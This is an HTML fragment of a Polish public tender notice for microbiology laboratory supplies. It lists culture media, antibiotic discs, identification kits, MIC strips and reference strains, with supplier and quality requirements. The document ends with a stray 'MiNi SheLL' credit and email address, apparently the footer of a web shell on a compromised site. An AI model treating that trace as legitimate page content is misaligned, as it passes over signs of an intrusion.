16	SF - bulion ( z seleninem)			kg	1,0
17	SS - Agar			kg	1,0
18	Todd- Hewitt bulion  (w butelkach a 500 ml)			ml	500,0
19	Trichomedium  (w butelkach a 500 ml)			ml	500,0
20	Woda peptonowa z tryptofanem			kg	0,5
21	Agar czekoladowy 			płytki	500,0
22	Agar czekoladowy z bacytracyną			płytki	500,0
23	CHROMagar Candida			płytki	200,0
24	CHROMagar Strep B ( do izolacji paciorkowców z gr B)			płytki	150,0
25	CLED Agar			płytki	700,0
26	Columbia Agar z 5% krwią baranią			płytki	500,0
27	Columbia CNA agar z 5% krwią baranią			płytki	400,0
28	Enterococcus Screen Agar (z  wankomyc)			płytki	100,0
29	Jałowa krew barania odwłókniona bez perełek  w butelkach a  100  ml.			ml.	2 000,0
30	Jałowa krew końska odwłókniona bez perełek  w butelkach a  100 ml.			ml.	1 000,0
31	MacCokey Agar			płytki	700,0
32	Mannitol Salt Agar ( Chapmann)			płytki	500,0
33	Mueller Hinton  Agar z 5% krwią baranią 			płytki	100,0
34	Mueller Hinton  Agar z 5% krwią końską i 20 mg/L
 NAD (MH-F)			płytki	100,0
35	Mueller Hinton Agar			płytki	700,0
36	Mueller HintonI Agar z kloksacyliną			płytki	100,0
37	Podłoże do hodowli Enterococcus			płytki	400,0
38	Podłoże selektywne do izolacji Pseudomonas z cetrymidem			płytki	300,0
39	Podłoże transportowe do posiewu moczu (typu Uromedium)			szt.	350,0
40	Sabouraud Dextrose ( Podłoże z chloramfenikolem i gentamycyną)			płytki	400,0
41	SS - Agar			płytki 	400,0

Producent podłoży musi posiadać certyfikat ISO 13845 i ISO 9001, deklaracje zgodności, certyfikaty analizy - dołączyć do oferty.										
Terminy ważności podłoży na płytkach: min. 5-6 tygodni dla pożywek zawierających krew, min.6-8 tygodni dla pozostałych pożywek. Do oferty dołączyć wykaz terminów ważności pożywek.										
Nadruk na płytce musi być czytelny, znajdować się na spodzie płytki i zawierać nazwę pożywki, nr serii, datę ważności i godzinę rozlania.										
Do każdej dostawy  musi być dołączone ( lub dostępne na stronie internetowej ) świadectwo kontroli jakości podłoża, które powinno zawierać:nazwę producenta, nazwę porduktu, nr serii,datę ważności, ogólną charakterystykę pożywki: kolor,pH, kontrola jałowości, wzrostu, charakterystykę mikrobiologiczną: wykaz szczepów kontrolnych z kolekcji ATCC. Dla pożywki Mueller Hinton certyfikat powinien zawierać kontrolę stabilności pożywki z uzyskanymi wynikami dla poszczególnych szczepów i krążków antybiotykowych. Podpis osoby kontrolującej lub informacje o elektronicznej walidacji certyfikatu.										
Dostawca ma obowiązek dostarczyć płytki bez uszkodzeń mechanicznych.							 			 
										
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8 - krążki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Amikacyna 30			fiolka a 50 szt.	10
2.	Amoksycylina 10			fiolka a 50 szt.	5
3.	Amoksycylina/kwas klawulanowy 20/10			fiolka a 50 szt.	20
4.	Ampicylina 10			fiolka a 50 szt.	20
5.	Ampicylina 2			fiolka a 50 szt.	5
6.	Ampicylina/sulbaktam 10/10			fiolka a 50 szt.	10
7.	Aztreonam 30			fiolka a 50 szt.	5
8.	Cefadroksyl 30			fiolka a 50 szt.	10
9.	Cefaklor30			fiolka a 50 szt.	30
10.	Cefaleksyna 30			fiolka a 50 szt.	10
11.	Cefazolina 30			fiolka a 50 szt.	5
12.	Cefepim 30			 fiolka a 50 szt. 	15
13.	Cefoksytyna 30			fiolka a 50 szt.	20
14.	Cefoperazon/sulbactam 30/75			fiolka a 50 szt.	5
15.	Cefotaksym 30			fiolka a 50 szt.	20
16.	Ceftibuten 30			fiolka a 50 szt.	10
17.	Cefiksim 5			fiolka a 50 szt.	10
18.	Cefotaksym 5			fiolka a 50 szt.	20
19.	Ceftazydym 10			fiolka a 50 szt.	20
20.	Ceftazydym 30			fiolka a 50 szt.	20
21.	Ceftriakson 30		 	fiolka a 50 szt.	5
22.	Cefuroksym 30			fiolka a 50 szt.	20
23.	Chinupristina/dalfopristina15			fiolka a 50 szt.	10
24.	Chloramfenikol 30			fiolka a 50 szt.	5
25.	Ciprofloksacyna 5			fiolka a 50 szt.	20
26.	Dezoksycholan sodu 			fiolka a 50 szt.	50
27.	Doripenem 10			fiolka a 50 szt.	5
28.	EDTA    (fiolka a 2 ml.)			fiolka  	10
29.	Ertapenem 10			fiolka a 50 szt.	10
30.	Erytromycyna 15			fiolka a 50 szt.	10
31.	Fosfomycyna (trometamol ) 200			fiolka a 50 szt.	5
32.	Gentamicyna 10			fiolka a 50 szt.	10
33.	Gentamicyna 30			fiolka a 50 szt.	10
34.	Imipenem 10			fiolka a 50 szt.	10
35.	Klindamycyna 2			fiolka a 50 szt.	15
36.	Krążki jałowe			fiolka a 50 szt.	20
37.	Krązki BC do identyfikacji Moraxella			krążek a 50 szt.	3
38.	Krążek z nitrocefiną 			krążek a 50 szt.	3
39.	Krążki do różnicowania E. Faecalis i E. Feaecium			krążek a 50 szt.	5
40.	Krążki identyfikacyjne dla Haemophilus
( BVX, BV, BX) 			krążek a 50 szt.	6
41.	Krążki na oxydazę cytochromową			krążek a 50 szt.	5
42.	Krążki z bacytracyną do identyfikacji S. Pyogenes 			krążek a 50 szt.	3
43.	Krążki z optochiną do identyfikacji 
S. Pneumoniae			krążek a 50 szt.	10
44.	Kwas boronowy (fiolka a 2 ml. )			fiolka 	10
45.	Kwas fusydowy 10			fiolka a 50 szt.	5
46.	Kwas nalidyksowy 30			fiolka a 50 szt.	5
47.	Lewofloksacyna 5			fiolka a 50 szt.	2
48.	Linezolid 10			fiolka a 50 szt.	5
49.	Meropenem 10			fiolka a 50 szt.	10
50.	Minocykina 30			fiolka a 50 szt.	5
51.	Moksifloksacyna 5			fiolka a 50 szt.	5
52.	Mupirocyna 200			fiolka a 50 szt.	1
53.	Netilmycyna 10			fiolka a 50 szt.	5
54.	Nitrofurantoina 100			fiolka a 50 szt.	20
55.	Norfloksacyna 10			fiolka a 50 szt.	10
56.	Novobiocyna 30			fiolka a 50 szt.	1
57.	Odczynnik PYR ( 1 fiolka a        ml. )			ml.	150
58.	Ofloksacyna 5			fiolka a 50 szt.	5
59.	Oksacylina 1			fiolka a 50 szt.	10
60.	Penicylina G (penicylina benzylowa) 1UI			fiolka a 50 szt.	10
61.	Penicylina V ( fenoksymetylopenicylina)10			fiolka a 50 szt.	5
62.	Piperacylina /tazobaktam ( 30/6 )  36			fiolka a 50 szt.	10
63.	Piperacylina 30			fiolka a 50 szt.	10
64.	Pyra test 			paski	300
65.	Rifampicyna 5			fiolka a 50 szt.	5
66.	Streptomycyna 300			fiolka a 50 szt.	10
67.	Telitromycyna 15			fiolka a 50 szt.	5
68.	Teikoplanina 30			fiolka a 50 szt.	10
69.	Tetracyklina 30			fiolka a 50 szt.	10
70.	Tigecyklina 15			fiolka a 50 szt.	5
71.	Tikarcylina /kwas klawulanowy (75/10) 85			fiolka a 50 szt.	10
72.	Tikarcylina 75			fiolka a 50 szt.	10
73.	Tobramycyna 10			fiolka a 50 szt.	5
74.	Trimetoprim 5			fiolka a 50 szt.	10
75.	Trimetoprim/sulfametoksazol ( 1:19) 25			fiolka a 50 szt.	10
76.	Vankomycyna 5			fiolka a 50 szt.	10


Krążki antybiotykowe powinny posiadać termin ważnośći min. 12 mc.  i pochodzić od jednego producenta.							 			 
Każda fiolka musi posiadać etykietę z nazwą antybiotyku, jego stężeniem, datą ważności i nr serii.							 			 
Każda fiolka musi być zapakowana oddzielnie w hermetycznie zamknięty blister.										 
Na każdym pojedynczym krążku musi widnieć jego symbol i stężenie w ug wydrukowane obustronnie.										
Do każej dostawy musi być dołączone świadectwo kontroli na krążki antybiotykowe ( lub dostępne na stronie internetowej), które powinno zawierać:nazwę producenta, 
nazwę antybiotyku, stężenie, nr serii, datę ważności, kontrolę stężenia antybiotyku na krążku, kontrolę na szczepach wzorcowych wraz ze strefami.										
Każdy krążek musi zawierać międzynarodowe niezmieniające się oznaczenie i stężenie antybiotyku zgodnie z zaleceniami EUCAST.										

										
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Podłoża do posiewu krwi - apart BACTEC 9050.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Podłoża Bactec Plus - podłoża tlenowe			butelki	200
2	Podłoża Bactec Plus - podłoża beztlenowe			butelki	200
3	Podłoża Bactec Plus - podłoża pediatryczne			       butelki 	150
4	Suplement FOS			zestaw	2
5	Pojemniki z styropianu do transportu podłóż z krwią  (op.a 10 szt.)			op.	1


Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 - Manualne zestawy do identyfikacji drobnoustrojów do oprogramowania BBL Crystal - system.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	BD Crystal - Zestaw do identyfikacji pałeczek Gram - ujemnych  (1 zestaw a 20 oznaczeń) 			zestaw	15
2.	BD Crystal - Zestaw do identyfikacji bakterii Gram - dodatnich   (1 zestaw a 20 oznaczeń)			zestaw	15
3.	BD Crystal - Zestaw do identyfikacji Neisseria/ Haemophillus   (1 zestaw a 20 oznaczeń)			zestaw	2
4.	BD Crystal - Zestaw do identyfikacji beztlenowców
(1 zestaw a 20 oznaczeń)		zestaw	5


Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 - testy MIC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cefotaksym 
( op.a  10 pasków)			paski	50
2.	Ceftazydym 
( op.a  10 pasków)			paski	30
3.	Imipenem 
( op.a 10 pasków)  	paski	30
4.	Meropenem 
( op.a 10 pasków)			paski	30
5.	Penicilina 
( op.a 10 pasków)		paski	50
6.	Teikoplanina
(op. a 10 pasków)			paski	20
7.	Kolistyna 
(op. a 10 pasków)			paski	20
8.	Gentamycyna
(op. a 10 pasków)			paski	20
9.	Vankomycyna 
( op.a  10 pasków)			paski	30

	Uwaga!								

Paski z gradientem antybiotyku muszą być plastikowe, pakowane hermetycznie z pochłaniaczem wilgoci.									
									
Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 - testy do oznaczania lekowrażliwości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Testy do oznaczania lekowrażliwości dla beztlenowców
(zestaw  a 10 testów)			zestaw	2
2.	Testy do oznaczania lekowrażliwości Candida spp.
(zestaw a 25 testów )			zestaw	2

Testy do oznaczania lekowrażliwości zgodne z zaleceniami EUCAST.										
										
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13 - Testy  lateksowy do identyfikacji bakterii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Test lateksowy do identyfikacji pneumokoków                                          (1 op. = 50 ozn.)			oznaczenia	250
2.	Test lateksowy do identyfikacji gronkowca złocistego                ( 1 op. = 50 ozn.)			oznaczenia	250
3.	Test do identyfikacji drobnoustrojów izolowanych z płynu mózgowo- rdzeniowego			oznaczenia	50
4.	Test lateksowy do identyfikacji paciorkowców z grup A, B, C, D, F, G (1 op. = 50 ozn.)			oznaczenia	250
5.	Strepto Plus A - odczynnik lateksowy do testu z poz. nr 4 pakietu nr 13			 fiolka	2
6.	Strepto Plus B - odczynnik lateksowy do testu z poz. nr 4 pakietu nr 13			fiolka	2

Zamawiający wymaga:
W poz.5 i 6 odczynnika lateksowego z enzymem										
							 			 
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14 - Testy do identyfikacji bakterii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Lateks Salmonella - zestaw diagnostyczny do wykrywania i identyfikacji grupowych antygenów pałeczek Salmonella B, C1, C2, D, E, G			zestaw	1

Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15 -Opis systemu do analizy mikrobiologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pałeczki Gram ujemne (-) ID + MIC, testy do identyfikacji biochemicznej i oznaczania lekowrażliwości bakterii G (-)		szt.	500
2	Staphylococcus i Enterococ + Strep B i D ;  ID + MIC, testy do identyfikacji biochemicznej i oznaczania lekowrażliwości bakterii Gram ( + ) 		szt.	200
3	Testy do oznaczania ID i  lekowrażliwości bakterii G (-) z oznaczeniem wartości MIC  leki skierowane na Niefermentujące 		szt.	80
4	HAEMO ID, testy do identyfikacji biochemicznej bakterii z rodzaju Haemophilus i Neisseria 		szt.	80
5	Testy do identyfikacji i oznaczania  lekowrażliwości bakterii Gram minus  z moczu		szt.	250
6	Streptococcus MIC, testy do oznaczania lekowrażliwości Streptococcus pneumoniae,  paciorkowców B-hemolitycznych oraz Viridans  z oznaczaniem wartości MIC		szt.	60

Dzierżawa analizatora (przez okres 12 miesięcy)										
Dzierżawa -12 miesiecy		szt.	1				
Uwaga!										
1. Dostawa odczynnikow i materialow zuzywalnych w ciagu 5 dni roboczych										
2. Instalacja aparatu w ciagu 4 tyg. od daty podpisania umowy										
3.Oferent zobowiazany jest do przeprowadzenia bezplatnego szkolenia personelu w zakresie obslugi aparatu										
4.Oferent jest zobowiazany przez caly czas trwania umowy dzierzawy do wykonywania bezplatnych napraw  i kontroli nad bezawaryjnym dzialaniem aparatu 										
5. Mozliwosc zglaszania awari przez 24h/dobę, czas reakcji serwisu max. do 24h										
										
Interpretacja MIC zgodnie z wartościami granicznymi EUCAST										
										
Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.										
										
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16 - wzorzec McFarlanda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wzorzec MC Farlanda 
(zestaw a 30 ml. )		zestaw	2

Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17 - saszetki do pojemników i suchy wskaźnik atmosfery beztlenowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Saszetki do pojemników wytwarzające środowisko beztlenowe  ( op. a        szt.)			szt	200
2. 	Suchy wskaźnik atmosfery beztlenowej (op. a        szt.)			szt	150
Zamawiający wymaga :
 Wpisania w kolumnie -Nazwa artykułu- ilości sztuk w pojedyńczym opakowaniu.										
										
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET 18 - Szczepy wzorcowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szczep wzorcowy ATCC P. aeruginosa 27853			wymazówka	2
2.	Szczep wzorcowy ATCC E. coli 25922			wymazówki	2
3.	Szczep wzorcowy ATCC S. aureus 29213			wymazówki	2
4.	Szczep wzorcowy ATCC E faecalis 29212			wymazówki	2
5.	Szczep wzorcowy ATCC S. pneumoniae 49619			wymazówki	2
6.	Szczep wzorcowy NCTC H. influenzae 8468			wymazówki	2
6.	Sterylne fiolki z koralikami do przechowywania szczepów wzorcowych w niskich temperaturach			fiolka	40

Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
									
Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19 - Testy  kasetkowe do identyfikacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Test imunoenzymatyczny do oznaczania rotawirusów i adenowirusow w kale ( 1 op. = 20 ozn.)			oznaczenia	400
2	Test do oznaczania Clostridium difficille w kale -toksyna A i B
czułość toksyna:
A - 0,063 ng/ml
B - 1,25 ng/ml			oznaczenia	80
3	Test do oznaczania Clostridium difficille w kale -GDH
czułość 0,8 ng/ml
			oznaczenia	50
4	Szybki test do identyfikacji Paciorkowców gr A z wymazów z gardła 			oznaczenia	100

Zamawiający wymaga:
W pozycji nr 1 i 4  - testów kasetkowych  pojedynczo pakowanych z oddzielnym buforem. 1 test = kasetka + bufor
W pozycji  nr 2 i 3 kontrola dodatnia w zestawie, skalowane pipety w zestawie, możliwość przechowywania próbki bez zamrożenia do 72 h										
							 			
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20 - Testy  płytkowy do identyfikacji wirusów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Test imunochromotograficzny - szybki test jakościowy do wykrywania RSV w próbkach z układu oddechowego
(op. a          oznaczeń.)			oznaczenia	50


Zamawiający wymaga :
Wpisania w kolumnie -Nazwa artykułu- ilości sztuk w pojedyńczym opakowaniu  i dołączenia do oferty metodyk w języku polskim potwierdzających spełnienie wymagań SIWZ przez oferowany asortyment.										
							 			 
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21 - test ureazowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szybki mokry test ureazowy do wykrywania Helicobacter pylori w bioptatach z żołądka
(op.      a testów )			 test	300


Zamawiający wymaga :
 Wpisania w kolumnie -Nazwa artykułu- ilości sztuk w pojedyńczym opakowaniu.										
										
	Uwaga:w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: -nie stosuje-.									
										
	Brak wypełnienia kolumny -Nazwa handlowa /producent - wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiajacego należy wpisać zwrot - Jak u Zamawiającego -..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com